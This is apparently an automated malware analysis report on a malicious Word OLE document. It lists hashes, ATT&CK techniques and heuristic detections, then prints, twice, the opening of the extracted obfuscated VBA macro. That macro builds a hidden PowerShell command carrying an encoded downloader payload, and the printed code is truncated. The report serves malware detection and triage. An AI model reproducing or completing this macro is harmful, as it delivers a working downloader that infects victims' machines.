Office (OLE) malware analysis — malicious · 8cd8b4ce09ae1cb0

MALICIOUS

Office (OLE)

108.2 KB Created: 2018-05-23 22:06:00 Authoring application: Microsoft Office Word First seen: 2020-02-04

MD5: 5911a9005d07ee191901a7daba719f4b SHA-1: 3f856ded058e506adef9c064e6e3102ac0e2f7f0 SHA-256: 8cd8b4ce09ae1cb044e3a07e77ff783af2829e2c5a6bf6c4f7bf2a946ce3f223

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an AutoOpen function, which is a common technique for malicious Office documents. The macro utilizes the Shell() function to execute a PowerShell command. This command is obfuscated through string concatenation but reconstructs to 'powershell -WinDowStyle hidden -e IABp', indicating it's designed to download and execute a second-stage payload. The large slack space in the OLE structure is also a common indicator of packed or obfuscated malicious content.

Heuristics 6

VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 110,848 bytes but its declared streams total only 36,022 bytes — 74,826 bytes (68%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15320 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15320 bytes
SHA-256: `667ca68f80c1c2b661d36eb5634905ef4026518fe154721e4724e4cb89c332ec`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "QlzKpimi" Function FqNfhziY() On Error Resume Next wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi) WtWTrD = 75141 OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp" iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs) UmZEi = 36259 JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA" HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW) dvaDS = 34516 ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7" SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj) zcjSkt = 2243 bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH" WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd) GrkzMw = 61485 SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf" ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro) HBbid = 85167 QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ" zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC) ZharpE = 36921 iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A" FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc End Function Function PFDVqbAoP() On Error Resume Next VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp) JSUao = 66889 zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB" AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw) QinsC = 32876 OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9" lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK) Cdsjp = 66608 WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA" jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu) iKwHf = 55985 QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH" tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW) UObPt = 41972 VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs" hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn) wzClDY = 68863 otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIAfQB7" + "ADcANgB9A" + "HsAMgB9" URBbCh = DkZzmr - Cos(dOqwo) * 1 - Chr(89635) / 11834 - ChrB(bdfwh) RAsww = 46464 QOwDIlGqz = "AHsAOQAyAH" + "0AewA5AH" + "0AewAwAH0AewAyA" + "DcAfQB" + "7ADQAOAB9AHsAN" PFDVqbAoP = zEcKw + OVJakqMv + WsAfvzP + QRBpdz + VJrFBkt + otWfPXMzZj + QOwDIlGqz End Function Function ZbKinzvB() On Error Resume Next UdEQMH = kaWBk - Cos(VovGk) * 1 - Chr(79227) / 86794 - ChrB(qYwFA) mjjwn = 36989 RtmlSRApm = "QAzAH0AewA2" + "AH0AewAx" + "ADUAfQB7ADgAMQB" + "9AHsAMwB9AHsA" + "NAA2AH0Aew" Ikmjcn = jAGiMK - Cos(dFmOJ) * 1 - Chr(59669) / 59208 - ChrB(FIKLoc) uYNQf = 25324 aqCjlKzur = "A1ADAAfQB7" + "ADUANgB9AHsAMwA" + "yAH0AewA5" + "ADUAfQB7ADkA" + "OQB9AHsANwA" IaIBC = qRRtp - Cos(Jiuki) * 1 - Chr(77319) / 24622 - ChrB(fiVQwN) FiQvfp = 48693 FsYAi = "1AH0AewAxADc" + "AfQB7A" + "DgANw" + "B9AHsANAAzAH0Ae" + "wA2ADgAfQ" + "B7ADgAMwB9AHsAM" LFHcIo = qRWYTW - Cos(ojcSj) * 1 - Chr(47330) / 59158 - ChrB(sDoqk) BzKakh = 66493 BkzFRWSo = "QAxADEAfQB7ADE" + "AMAA1A" + "H0AewA0ADcAfQB7" + "ADIAMAB9AHsANgA" + "zAH0AewAz" + "ADcAf" + "QB7ADEAMQAwA" + "H0AewA5AD" ZbKinzvB = RtmlSRApm + aqCjlKzur + FsYAi + BkzFRWSo End Function Function HpRniEwwPQ() On Error Resume Next WLEprn = uZuJF - Cos(hTNGAR) * 1 - Chr(13817) / 25121 - ChrB(nRDEp) LwjoR = 18211 zwijZsALHB = "AAfQB7AD ... (truncated)

SHA-256: 667ca68f80c1c2b661d36eb5634905ef4026518fe154721e4724e4cb89c332ec

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "QlzKpimi"
Function FqNfhziY()
On Error Resume Next
wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi)
WtWTrD = 75141
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs)
UmZEi = 36259
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW)
dvaDS = 34516
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj)
zcjSkt = 2243
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd)
GrkzMw = 61485
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro)
HBbid = 85167
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC)
ZharpE = 36921
iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
Function PFDVqbAoP()
On Error Resume Next
VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp)
JSUao = 66889
zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB"
AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw)
QinsC = 32876
OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9"
lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK)
Cdsjp = 66608
WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA"
jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu)
iKwHf = 55985
QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH"
tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW)
UObPt = 41972
VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs"
hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn)
wzClDY = 68863
otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIAfQB7" + "ADcANgB9A" + "HsAMgB9"
URBbCh = DkZzmr - Cos(dOqwo) * 1 - Chr(89635) / 11834 - ChrB(bdfwh)
RAsww = 46464
QOwDIlGqz = "AHsAOQAyAH" + "0AewA5AH" + "0AewAwAH0AewAyA" + "DcAfQB" + "7ADQAOAB9AHsAN"
PFDVqbAoP = zEcKw + OVJakqMv + WsAfvzP + QRBpdz + VJrFBkt + otWfPXMzZj + QOwDIlGqz
End Function
Function ZbKinzvB()
On Error Resume Next
UdEQMH = kaWBk - Cos(VovGk) * 1 - Chr(79227) / 86794 - ChrB(qYwFA)
mjjwn = 36989
RtmlSRApm = "QAzAH0AewA2" + "AH0AewAx" + "ADUAfQB7ADgAMQB" + "9AHsAMwB9AHsA" + "NAA2AH0Aew"
Ikmjcn = jAGiMK - Cos(dFmOJ) * 1 - Chr(59669) / 59208 - ChrB(FIKLoc)
uYNQf = 25324
aqCjlKzur = "A1ADAAfQB7" + "ADUANgB9AHsAMwA" + "yAH0AewA5" + "ADUAfQB7ADkA" + "OQB9AHsANwA"
IaIBC = qRRtp - Cos(Jiuki) * 1 - Chr(77319) / 24622 - ChrB(fiVQwN)
FiQvfp = 48693
FsYAi = "1AH0AewAxADc" + "AfQB7A" + "DgANw" + "B9AHsANAAzAH0Ae" + "wA2ADgAfQ" + "B7ADgAMwB9AHsAM"
LFHcIo = qRWYTW - Cos(ojcSj) * 1 - Chr(47330) / 59158 - ChrB(sDoqk)
BzKakh = 66493
BkzFRWSo = "QAxADEAfQB7ADE" + "AMAA1A" + "H0AewA0ADcAfQB7" + "ADIAMAB9AHsANgA" + "zAH0AewAz" + "ADcAf" + "QB7ADEAMQAwA" + "H0AewA5AD"
ZbKinzvB = RtmlSRApm + aqCjlKzur + FsYAi + BkzFRWSo
End Function
Function HpRniEwwPQ()
On Error Resume Next
WLEprn = uZuJF - Cos(hTNGAR) * 1 - Chr(13817) / 25121 - ChrB(nRDEp)
LwjoR = 18211
zwijZsALHB = "AAfQB7AD
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.